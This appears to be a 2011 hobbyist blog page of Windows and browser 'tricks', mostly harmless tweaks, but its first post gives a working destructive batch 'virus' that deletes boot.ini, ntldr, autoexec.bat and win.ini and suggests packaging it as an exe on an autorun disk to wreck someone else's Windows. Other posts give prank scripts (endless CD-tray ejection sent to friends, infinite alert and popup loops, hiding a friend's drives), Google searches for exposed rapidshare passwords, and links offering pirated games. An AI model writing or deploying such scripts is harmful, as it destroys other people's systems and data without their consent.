Showing posts with label Fun. Show all posts
Showing posts with label Fun. Show all posts

Batch File Virus (a simple virus for windows)

I assume you know the basics about batch files before reading this post. Batch files are used to run a dos command without opening command prompt window. You can run many dos commands using a single batch file. This post will show you some batch files which can corrupt your Windows OS. You can also say that these batch files can work like a virus. So be careful and do not try it in your computer.
  • Autoexec.bat
  • Ntldr
  • Boot.ini
  • Win.ini
These files are very important and necessary for any Windows operating system. So if you want to corrupt Windows of any person, you have to delete these four files from the computer.
Open notepad and copy the following statements :

@echo off 
attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 
attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 

save this code as winVirus.bat.

If you want to make it more harmful, make its exe using bat_to_exe converter and make an autorun disk of it. When someone uses the disk, autorun will execute itself and command generated by the batch file will corrupt the windows.


Category: 2 comments

Create A Hidden User Account in Windows 7 and xp

  • For your own privacy purposes or say it for security reasons you can Create A Hidden User Account under windows xp/7 operating system. 
  • This tweak will easily allow you an account that is normally displayed on the Welcome screen to be hidden from view. To log on using that hidden account it is necessary to use the Log On To Windows dialog box similar to the one that in Windows 2000.
 1. [Start] [Run] [Regedit]
 
2. Registry Key: HKEY_LOCAL_MACHINE \SOFTWARE\ Microsoft\ WindowsNT\ CurrentVersion\ Winlogon\ SpecialAccounts\ UserList

3. Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.

4. Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden

5. Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]

6. Exit Registry and Reboot...

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups.

Category: 0 comments

Javascript Hacks

Here are some most commonly used javascript tricks and they are extremely useful sometimes.

1. Persistent Alert Box

This JavaScript is one of many where the function repeats itself within itself, so it never ends when you click "OK" on the alert box. Just type this in any browser and hit enter, replacing YOUR MESSAGE with the message you want to be displayed.

javascript:function MakWasHere() { alert("YOUR MESSAGE"); MakWasHere(); } MakWasHere();
2. A fluttering of popup windows - Works best in Internet Explorer!

Some versions of Firefox or Chrome will just open new tabs if not configured properly (You can change this setting in their Preferences), and thus making the easiest way to stop the trick by Alt + F4'ing. In IE, (especially versions before IE7), you're running a never-ending loop of popup windows.
Popup blockers will usually not suppress this command since the user is running it directly.
Run this from the address bar, replacing the URL with any URL you want:

javascript:function MakOpenIt() { window.open("http://www.mayanksmansion.tk/");
MakOpenIt();} MakOpenIt();



Enjoy...

Category: 0 comments

Crazy Notepad Trick To Continuously Popout CD Tray

Continuously pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them! By seeing the below image I hope you will understand what the below crazy script actually does.


Open Notepad and Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “cdtray.VBS” and send it.


Double Click it if you wanna see it working. Its a very funny Notepad Trick.
Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”


Category: 1 comments

Flip All Your Browser Photos

  1. Open any web page in your browser.
  2. Delete everything in the address bar.
  3. Copy the following javascript and paste it in the address bar:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

NOtice: To stop the effect , just refresh the web page ( press the F5 button on the keyboard)

Category: 0 comments

Hidden Mozilla Tricks

Type or Copy the given codes in Inverted Commas in the address bar of Firefox.

1.”chrome://browser/content/browser.xul”(without quotes)-It Opens  Firefox inside the existing Firefox window.

2.”chrome://browser/content/preferences/preferences.xul”(without quotes)-It Opens the Options dialog box inside the Firefox.

3.”chrome://browser/content/bookmarks/bookmarksPanel.xul”(without quotes)-It Opens the Book Marks Manager inside the Firefox window.

4.”chrome://browser/content/history/history-panel.xul”(without quotes)-It Opens the History of web inside the Firefox tab.

5.”chrome://mozapps/content/extensions/extensions.xul?type=extensions”(without quotes)-It Opens the Extensions window in the current tab.

6.”chrome://browser/content/preferences/cookies.xul”(without quotes)-It shows the “cookies window” inside the Firefox window.

7.”chrome://browser/content/preferences/sanitize.xul”(without quotes)-It shows the “Clear Private Data” window inside the current tab.

Note: Do not delete the data if you don't want to loose your history or cookies……

8.”chrome://browser/content/aboutDialog.xul”(without quotes)-It Opens the “about firefox” Dialog box inside the window.

9.”chrome://browser/content/credits.xhtml”(without quotes)-IT shows the   list of  the fathers of the firefox(who build the firefox)

10.”chrome://global/content/alerts/alert.xul”-It shows the naughty Firefox.

Enjoy...

Category: 20 comments

Hidden Themes for Windows 7

When installing Window 7 you get an option to choose your language, timescale and currency. This then installs a set of Windows themes and wallpapers preset for the language you chose.
What you may not know is that you can find on your PC how to install the other wallpapers and themes that don’t come with the set you chose.
I am going to show you the way to install these so you can enjoy the most out of Windows 7 themes and wallpapers.

1. Click Start menu, in the search bar type  C:\Windows\Globalization\MCT.

2. You will be shown a list of subfolders which will open up in Windows Explorer. In each folder there will be a set of different wallpapers for each different Country. For example, MCT-AU would be Australia MCT-CA would be for Canada and so on. Choose the Country of the themes you would like to use, go into the folder, select a them you would like and double click.

3. This should now have installed a shortcut for the selected theme in the Personalization section of Control Panel and can be used in the same way you use your other themes, by right clicking the desktop and clicking personalize and choosing the theme of your choice.
Enjoy!

Category: 0 comments

Microsoft crazy fact

An unbelievable problem in microsoft ...At Microsoft the whole Team, including Bill Gates, couldn't answer why this happened!



It was discovered by a Brazilian. Try it out yourself...


Open Microsoft Word and type

=rand (200, 99)

And then press ENTER

then see the magic..........
 (IT WILL NOT HARM YOUR SYSTEM)

Category: 2 comments

How To Hack a WebSite--The Funny Way

A simple way to hack a website and laugh with your friends.
Of course it is not a real hacking ....

  1. Open a web browser you use more frequently and open a webpage you like more.
  2. Copy the code:
javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0.

and Paste it into the address bar of the browser.
Now you can change anything on the webpage as in a notepad.
 
 
Category: 0 comments

Download Fifa 2011

 FIFA 11 reinvents player authenticity – on and off the ball – for every player and at every position on the pitch with Personality+, an all-new feature that sees individual abilities reflected in game, enabling clear differentiation for every player.
With Personality+ a footballer’s abilities on the pitch is mirrored authentically in game, creating individual personalities. Players will be distinguished from one another through a sophisticated database that evaluates and grades each player’s skill-set over 36 attributes and 57 traits, compiled by 1700 scouts around the world. Real Madrid’s Kaka will deliver crisp, creative passes, Barcelona’s Andres Iniesta will utilize tighter turns and close control to dribble through defenses, Manchester United’s Wayne Rooney will hold off defenders and strike shots from distance with pace, and top-flight defenders like Giorgio Chiellini of Juventus will anticipate, predict and react to offensive players to win back possession.
Goalkeepers have also been injected with Personality+. The real-life personality of the keeper, whether acrobatic or traditional, will dictate his style in game. Dive attributes will determine the keepers with the ability to reach for further shots while reflex attributes determine reaction times, so a keeper like Petr Cech of Chelsea FC will show be able to showcase world-class skills.
Building on the FIFA 10 gameplay that won 50 sports game of the year awards, FIFA 11 introduces new Pro Passing where pass accuracy is determined by a gamer’s ability on the control pad, and player skill, situation and urgency on the pitch, yielding a deeply rewarding passing system. Plus, a series of new customization tools will enable fans to transform FIFA 11 in new and personally meaningful ways. Assign customized chants for every team and league and play music tracks from your existing library from within the game.

Click here to download the game.
Enjoy...


Category: 1 comments

Run Firefox inside Firefox

How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too. Just type this in  Firefox's address bar and there you go!
Firefox inside Firefox!



chrome://browser/content/browser.xul


Following is the screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)-




Enjoy...

Category: 2 comments

Download Call Of Duty Black Ops

Call of Duty: Black Ops is a first-person shooter video game developed by Treyarch, published by Activision and released worldwide on November 9, 2010 for Microsoft Windows, Xbox 360, PlayStation 3, Wii, and Nintendo DS (separate version developed by n-Space) consoles. Announced on April 30, 2010, the game is the seventh installment of the Call of Duty series, and the first to be set in the Cold War. It is the third in the series to be developed by Treyarch, and is a sequel to the developer's Call of Duty: World at War.
Within 24 hours of going on sale, the game sold more than 7 million copies, 5.6 million in the U.S. and 1.4 million in the U.K., breaking the record set by its predecessor Modern Warfare 2 by some 2.5 million copies. A subtitled version was released in Japan on November 18, 2010. A Japanese-dubbed version was released on December 16, 2010.
In the game the player assumes the role of a foot soldier who can wield various firearms, of which two at a time can be carried; throw grenades and other explosives; and use other equipment as weapons. A player close enough to an enemy can kill with one knife blow. A character can take three stances: standing, crouching, or prone; each affects rate of movement, accuracy, and stealth. The player can dive prone from a standing position when running. The player can momentarily sprint but will then grow tired. The screen glows red to indicate damage to a player's health, which goes away over time. When the character is within the blast radius of a live grenade, a marker indicates the direction of the grenade, helping the player to flee or throw it back. Among the game's weapons are crossbows with bolts and explosive ammunition, Dragon's Breath rounds and ballistic knives.

Click here to download Call Of Duty Black Ops.


Category: 5 comments

Firefox: Change Address Bar Search Provider

When Firefox performs a search from the Address Bar, it queries the search engine string you have setup within Firefox. If it’s using Yahoo, you can switch to Google. Don’t like Google? Use Ask. Here’s how to switch which search engine Firefox searches when you use the address bar to search.
1. In Firefox type about:config in the address bar and press ENTER.
2. Locate and double-click the entry for keyword.URL
3.  Set the value based on which search provider you would like to use for your address bar searches. Here are a few search strings you can use.

Yahoo: http://search.yahoo.com/search?p=
Ask: http://www.ask.com/web?q=
Google: http://www.google.com/search?&q=


Enjoy...

Category: 1 comments

How to open office 2007/2010 files in Office 2003

Today's tip will help you to resolve the compatibility issues between the Office 2003 and Office 2007/2010. Because all programs in office 2003 used the old file extensions for its different programs.  For example Word 2003 saved files with extension .doc, Excel 2003 with .xls and PowerPoint with .ppt. but on the other hand  office 2007 used the new file extensions for its different programs.  For example Word 2007 saved files with extension .docx, Excel 2007 with .xlsx and PowerPoint with .pptx. Now the problem is that when you try to open office 2007 files into office 2003 and you will not open the file due to compatibility issues between both office versions.  Microsoft provides a free compatibility pack to convert office 2007 documents to the office 2003 format. There are many third party free converter are available but here we are using Microsoft office compatibility pack.
Follow the given steps to download free Microsoft compatibility pack and install it.
To use this feature, you will need to be logged into your computer with administrative rights.
Visit the following link to download the Microsoft compatibility pack:

Hide your Hard Disk Drives for security & Privacy

This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.

1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane
create a new DWORD item and name it NoDrives (it is case sensitive).
Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
Now restart your computer.
So, now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again.


Category: 0 comments

Hacking Windows SEND TO MENU

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

5. DONE.


Category: 0 comments

Google Search Tricks!

Well let me tell you what actually google tricks mean. Google tricks/google tips, does not mean hacking google, Using the below Google operators, we can get the desired google result very quickly. Well we can name this as hidden google secrets or Advanced google searching.



Google Trick -1 :- GOOGLE OPERATOR
Type the following highlited words in google search box.
Google has several google operators that can help you find specific information, specific websites or inquire about the indexing of your own site, below you will find the most important ones

define: - This google operator will find definitions for a certain term or  word over the Internet. Very useful when you come across a strange word when writing a post. I use this as a google dictionary. example : (define computer)
info: - The google info operator will list the sets of information that    Google has from a specific website (i.e. info:http://hack2007.50webs.com)
site: - This google operator can be used to see the number of indexed     pages on your site (i.e.site:www.hack2007.50webs.com).                  Alternative it can also be used to search for information inside a specific        site or class of sites.
link: - This google link operator allows you to find backlinks pointing         to your site. Unfortunately the count is not updated frequently and             not all backlinks are shown
allinurl: - Using this Google operator will limit the search to results         that contain the desired keywords on the URL structure. (i.e. allinurl:dailyblogtips)
fileformat: - Useful Google operator for finding specific file formats. Sometimes you know that the information you are looking for is likely to be contained in a PDF document or on a PowerPoint presentation, for instance. (i.e. “fileformat:.pdf market research” will search for PDF documents that contain the terms “market” and “research”)

Google trick -2 Top 10 Cool Google Search Tricks

well as we have gained enough knowledge regarding google operators, lets have a look at the following 10 cool google search tricks. 
  1. Google trick to  search different file formats (keyword filetype:doc)
  2. Google trick to search educational resources (keyword site:.edu) example (computer site:.edu)
  3. Finding the time of any location (time romania)
  4. Finding the weather of any location (boston weather)
  5. Tracking commentary of live events (Olympic games Beijing 2008)
  6. Using Google as a calculator (9 * 10)(143+234)(119-8)
  7. Converting currencies (1 USD in INR)(10 US Dollars in Indian Rupee)
  8. Find how many teaspoons are in a quarter cup (quarter cup in teaspoons)
  9. how many seconds there are in a year (seconds in a year)
  10. Tracking stocks (stocks:MSFT)
  11. Finding faces (add imgtype=face to the URL)
 google trick -3 Top Essential Google Search shortcuts

#1: Get Local Weather

Type: “weather [city name or zip/postal code]”  
Example: “weather 500054″ or “weather boston”

#2: Check Flight Status

Google automagically pulls flight data from FlightStats.com. All you have to do is enter the flight number.  
Type: [flight name and/or number] 
Example: “bc254″ or “newyork21″

#3: Convert Distances

Type: “[value] [first distance unit] to [second distance unit]” 
Example: “100 kilometers to miles”

#4: Find a Phone Number

Find a Person:

Type: “[person’s name], [city or zip/postal code]” 
Example: “john smith, london”

Find a Business/store:

Type: “[business name or type], [city or zip/postal code]”
Example: “book store, boston”

Google trick -4 :Google search trick for Rapidshare files search:
#1 site:rapidshare.com inurl:users "*"

#2 site:rapidshare.de inurl:users "*"

#3 site:rapidshare.com inurl:files "*"

#4 site:rapidshare.de inurl:files "*"

#5 site:rapidshare.com inurl:users (pass|password)

#6 site:rapidshare.de inurl:users (pass|password)

Suppose u need some info on ebooks. Then u can try following keyword to see all rapidshare folders having any hacking related thing in it

site:rapidshare.com inurl:users "ebooks"

Enjoy...


Category: 109 comments

Speed up Acrobat Reader (almost like notepad)

Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.
1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad.



Category: 0 comments

Top 20 tricks to keep your system faster

Follow these tips and you will definitely have a much faster and more reliable PC! 
 1. Wallpapers: They slow your whole system down, so if you're willing to compromise, have a basic plain one instead!

2. Drivers: Update your hardware drivers as frequently as possible.  New drivers tend to increase system speed especially in the case of graphics cards, their drivers are updated by the manufacturer very frequently!

3. Minimizing: If you want to use several programs at the same time then minimize those you are not using.  This helps reduce the overload on RAM.

4. Boot Faster: The 'starting Windows 98/XP' message on startup can delay your booting for a couple of seconds.  To get rid of this message go to c:\ and find the file Msdos.sys.  Remove the Read-Only option.  Next, open it in Notepad or any other text editor.  Finally, go to the text 'Options' within the file and make the following changes: Add BootDelay=0.  To make your booting even faster, set add Logo=0 to remove the Windows logo at startup.

5. Restart only Windows: When restarting your PC, hold down Shift to only restart Windows rather than the whole system which will only take a fraction of the time.

6. Turn Off Animations:  Go to Display Settings from the Control Panel and switch to the Effects Tab. Now turn off Show Windows Content While Dragging and Smooth Edges on Screen Fonts.  This tip is also helpful with Windows XP because of the various fade/scroll effects.

7. Faster Start-Menu Access: Go to the Start menu and select Run.  Now type Regedit and hit Enter.  The Registry Editor will appear on the screen.  Now, open the folder HKEY_CURRENT_USER\Control Panel\Desktop.  You should see a MenuShowDelay value.  If you don't then do the following: right click on a blank space in the right pane and select New\String.  Change the name in the new value to MenuShowDelay.  Now that we have the MenuShowDelay value, double click on it and enter 0 in the value data field.  This sets the start menu delay to 0 milliseconds.

8. Resolutions: If you are willing to do anything for faster performance from your PC, then try lowering your display resolution.  The lower it is, the faster your PC.

9. Turn off Active Desktop:  Go to your Display Properties and switch to the Web tab.  Uncheck View My Active Desktop As a Web Page.  Since the Active Desktop option under Windows 98 uses a lot of system resources, this option can have a dramatic effect on the speed of the whole system.

10. Defragment Often:  Windows 98's Defrag tool uses Application Acceleration from Intel which means that when you defragment your drive, data is physically arranged on the drive so that applications will load faster.

11. Take your PC to Bed:  Using the Advanced Power Management feature under Windows 98 gives you the option to use the sleep command.  That way, you can send your PC to sleep instead of shutting it down and then restarting it.  It's as simple as pressing a button and then pressing the same button to wake it up.  You can tell Windows after how many minutes/hours of inactivity to automatically sleep the machine in the Advanced Power Management section of the Control Panel.

12. Faster Internet Access: If you use the internet for reference and the sites you visit are rarely  updated then try the following.  In IE (the same can be done in Netscape) go to Tools, Internet Options.  Next, click on Settings... in the Temporary Internet Files  section.  Finally, select Never for the first option and double the amount of storage space to use, click OK!

13. Benchmarking: Benchmarking can be very useful when run frequently.  It can tell you how your PC's components are performing and then compare them to other machines like yours.  For example, when you overclock your PC, you want to know how much more speed you have and whether it is stable.  All this and more can be discovered using benchmarking.  An excellent piece of software for doing this job is SiSoft Sandra which can be found in the Downloads File Archive!

14. Refresh the Taskbar without restarting: If you in some way change the taskbar, either in Regedit or elsewhere, you can refresh the task bar without restarting.  Hold down Ctrl Alt Del, and double click on Explorer.  Say Yes to close Explorer, but no to closing Windows.  This will refresh the Taskbar and system tray.

15. Quick CD Eject: Instead of pushing the button on your drive, right-click your CD drive letter in My Computer and click on Eject.  This will also remove any icons that have become associated with the CD drive.
 
16. Start Up Programs:  Windows can be slowed down when programs run on start up.  To eliminate this, check your Start up folder.  You can access it from the start menu: Start, Programs, Start Up.  Another way to eliminate programs from loading even before Windows actually starts is by doing the following: Click on Start, then Run.  Type msconfig.  It will take quite a long time for this program to load, but when you finally see it on your screen, explore the different tabs.  They all have to do with how quickly your PC boots, so select what you want, and uncheck what you don't want!

17. Fonts: When Windows starts, it loads every single font in the Fonts folder.  Therefore, the more fonts you have, the slower the booting process.  To get rid of unwanted fonts, simply go to the Fonts folder under c:\windows and remove whatever you don't want.  Fonts that have a red letter 'A' as their icon are system fonts, so don't delete them.

18. Stretching Wallpapers:  Don't "stretch" your wallpaper in Windows 98 since it actually slows Windows down when you drag icons around on the desktop.

19. RAM Matters: If you have less than 32MB then you should seriously think of upgrading it to at least 64MB.  Windows runs much more smoothly with 64MB or higher and tends to use less hard disk space for virtual memory.

20. Partitioning: A very nice little thing you can do to boost system performance.  By partitioning your hard drive, splitting one physical drive into several logical ones, you can gain several advantages.  1. If you get a virus or you accidentally format a drive, not all will be lost.  2. By placing the swap file (Win386.swp) on a separate drive, The swap file will be less fragmented and thus, faster. 3. Place Windows on a separate drive and whenever you need to reinstall it, you rest assured that your data is safe on a separate drive.  Partitioning can be done using a few programs such as FDisk which comes with DOS.  However, FDisk formats everything on the hard disk before partitioning. Alternatively, you can use Partition Magic from Power Quest to partition your hard disk without losing your data.


Category: 0 comments

Trick to make your firefox fast

This Firefox trick will improve the speed & load time of firefox. And you will be able to surf faster.
 

Type about:config in the address bar, Then look for the following entries, and make the corresponding changes.
network.http.max-connections-per-server =32
network.http.max-persistent-connections-per-proxy =16
network.http.max-connections = 64
network.http.max-persistent-connections-per-server = 10
network.http.pipelining = true
network.http.pipelining.maxrequests = 200
network.http.request.max-start-delay = 0
network.http.proxy.pipelining = true
network.http.proxy.version = 1.0 

Lastly right-click anywhere and select New- Integer. Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it receives. 
Enjoy!!!   


Category: 0 comments

Copyright ©

Creative Commons License
http://www.mayanksmansion.tk is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License

Protected by Copyscape Online Plagiarism Test

Copyright © 2011 Mayank Sharma. Powered by Blogger.